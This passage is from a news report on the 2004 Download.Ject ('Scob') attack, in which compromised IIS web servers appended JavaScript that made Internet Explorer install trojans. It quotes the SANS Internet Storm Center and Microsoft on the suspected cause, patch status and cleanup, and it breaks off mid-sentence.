The SANS Internet Storm Center, which tracks malicious Internet activity,
reported that a large number of popular Web sites were compromised earlier
this week to distribute malicious code that targets a known bug in
Microsoft Internet Explorer.
“The attacker uploaded a small file with JavaScript to infected Web
sites, and altered the web server configuration to append the script to all
files served by the web server,” the center alert warned.
If a user visited an infected site, the JavaScript delivered by the site would
instruct the user’s browser to download an executable from a Russian Web
site and install it, the alert added.
“These Trojan horse programs include keystroke loggers, proxy servers and
other back doors providing full access to the infected system.”
The center believes the attack is the work of a sophisticated
international spam ring.
“There is quite a bit of evidence that what we are
seeing is yet another technique for spreading and installing ‘spamware’ to
create proxies to relay and send spam. We don’t see any evidence that this
attack is related to the construction of a DDoS network.”
Early Friday morning, Microsoft issued a “critical” notice for the Download.Ject
malware. The software giant said it was investigating reports of
the malware targeting customers using Microsoft Internet Information
Services 5.0 (IIS) and the IE browser.
There is conflicting information on whether a patch is available to
protect against the hacker attack. Microsoft’s alert said Web servers
running Windows 2000 Server and IIS that have not applied a patch issued in
its MS04-011 advisory “are possibly being compromised and being used to
attempt to infect users of Internet Explorer with malicious code.”
However, The center said several server administrators
reported that they were fully patched.
“We do not know at this point how the affected servers have been
compromised,” the center’s alert said. “The SSL-PCT exploit is at the top of our list of suspects. If
you find a compromised server, we strongly recommend a complete rebuild. You
may be able to get your Web site back into business by changing the footer
setting and removing the JavaScript file. But this is likely a very
sophisticated attack and you should expect other stealthy backdoors.”
Once the hackers break into the Web site, files have been modified, and a
Trojan downloader called “Scob” or “Download.Ject” is appended to the files
causing IE to execute it. “No warning will be displayed. The user does not
have to click on any links. Just visiting an infected site will trigger the
exploit.”
The center said log files from a compromised server will show no alteration to
existing files on the server. “The JavaScript is included as a global
footer and appended by the server as they are delivered to the browser. You
will find that the global footer is set to a new file,” the center said in a
note to server administrators.
Advisories and disinfection instructions are available from Symantec,
F-Secure and Computer Associates.
Microsoft first reported the exploited IE vulnerability as extremely
critical on June 10, but the company has yet to issue a security fix.
“Microsoft is actively investigating these reports to determine the
appropriate course of action to protect our customers. This might include
providing a fix through our monthly release process or an out-of-cycle
security update, depending on customer needs,” Microsoft said in a statement.
Since then, malicious hackers have unleashed “zero day exploits” to load
adware